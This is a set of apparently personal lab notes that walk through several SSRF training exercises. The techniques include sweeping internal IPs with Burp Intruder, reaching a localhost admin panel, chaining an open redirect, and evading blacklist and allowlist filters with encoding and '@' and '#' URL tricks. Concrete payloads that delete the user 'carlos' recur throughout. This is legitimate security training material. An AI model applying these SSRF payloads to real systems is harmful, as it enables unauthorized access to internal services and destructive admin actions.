Table of Contents
Basic SSRF Against Another IP
Basic SSRF Against another IP
#GOAL: This lab has a stock check feature which fetches data from an internal system.
Visit a product, click check stock and intercept the request in Burp Suite, and send it to Burp Intruder.
Click Clear §, change the stockApi parameter to http://192.168.0.1:8080/admin then highlight the final octet of the IP address (the number 1), click "Add §".
Switch to the Payloads tab, change the payload type to Numbers, and enter 1, 255, and 1 in the From and To and Step boxes respectively.
Click Start attack.
Click on the Status column to sort it by status code ascending. You should see a single entry with a status of 200, showing an admin interface.
Click on this request, send it to Burp Repeater, and change the path in the stockApi to: /admin/delete?username=carlos
SSRF Against local Server
# Basic SSRF against the local server
## Goal: To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.
Browse to /admin and observe that you can't directly access the admin page.
Visit a product, click "Check stock", intercept the request in Burp Suite, and send it to Burp Repeater.
Change the URL in the stockApi parameter to http://localhost/admin. This should display the administration interface.
Read the HTML to identify the URL to delete the target user, which is:
http://localhost/admin/delete?username=carlos
I submitted this in the request and solved.
Bypassing SSRF filters via open redirection
Bypassing SSRF filters via open redirection
Goal: change the stock check url to access the admin interface at http://192.168.0.12:8080/admin and delete the user carlos
you can construct a URL that satisfies the filter and results in a redirected request to the desired back-end target.
For example, suppose the application contains an open redirection vulnerability in which the following URL:
/product/nextProduct?currentProductId=6&path=http://evil-user.net
We see this when clicking on the "next" button
GET /product/nextProduct?currentProductId=2&path=/product?productId=3 HTTP/1.1
Openredirect is where the application wil redirect you to an arbitrary url
You can use this to exploit the ssrf vuln
To do that- instead of /product/stock/check/productid
you can add the openredirect path that we had.... copy it and paste it under stockApi
stockApi=/product/nextProduct?currentProductId=1&path=http://<ip>admin
URL Encode:
/product/nextProduct%3fcurrentProductId%3d2%26path%3dhttp%3a//192.168.0.12%3a8080/admin
Delete user:
/product/nextProduct%3fcurrentProductId%3d2%26path%3dhttp%3a//192.168.0.12%3a8080/admin/delete?username=carlos
SSRF w/ Blacklist
This lab has a stock check feature which fetches data from an internal system.
To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.
The developer has deployed two weak anti-SSRF defenses that you will need to bypass.
localhost :: http://127.1/
-URL decoding one time
--regex search using a blacklist of strings is a very interesting approach here.
when we encoded it twice it worked because it just decodes it once
To delete we just append this to solve the lab to delete the user:
/admin/delete?username=carlos
Some applications only allow input that matches, begins with, or contains, a whitelist of permitted values. In this situation, you can sometimes circumvent the filter by exploiting inconsistencies in URL parsing.
The URL specification contains a number of features that are liable to be overlooked when implementing ad hoc parsing and validation of URLs
You can embed credentials in a URL before the hostname, using the @ character. For example:
https://expected-host@evil-host
You can use the # character to indicate a URL fragment. For example:
https://evil-host#expected-host
You can leverage the DNS naming hierarchy to place required input into a fully-qualified DNS name that you control. For example:
https://expected-host.evil-host
You can URL-encode characters to confuse the URL-parsing code. This is particularly useful if the code that implements the filter handles URL-encoded characters differently than the code that performs the back-end HTTP request.
You can use combinations of these techniques together.
Goal:
This lab has a stock check feature which fetches data from an internal system.
To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.
The developer has deployed an anti-SSRF defense you will need to bypass.
stockapi=http://localhost/
It looks like theyre validating this against a allowlist. Has to equal hostname stock.weliketoshop.net
Tried it with the
stockApi=http://username#@stock.weliketoshop.net
Parser that this app is using is parsing the http:// part then anything after is a url and after # is a bookmark/reference to element in the page.
You will get another error by url encoding it twice aka
stockApi=http://username%2523@stock.weliketoshop.net
indicates that we are working in the correct direction.
Replace username with localhost
stockApi=http://localhost%2523@stock.weliketoshop.net
We get a 200 response and see that its admin panel is available
Try to access admin panel
stockApi=http://localhost%2523@stock.weliketoshop.net/admin
finally stockApi=http://localhost%2523@stock.weliketoshop.net/admin/delete?username=carlos
by 
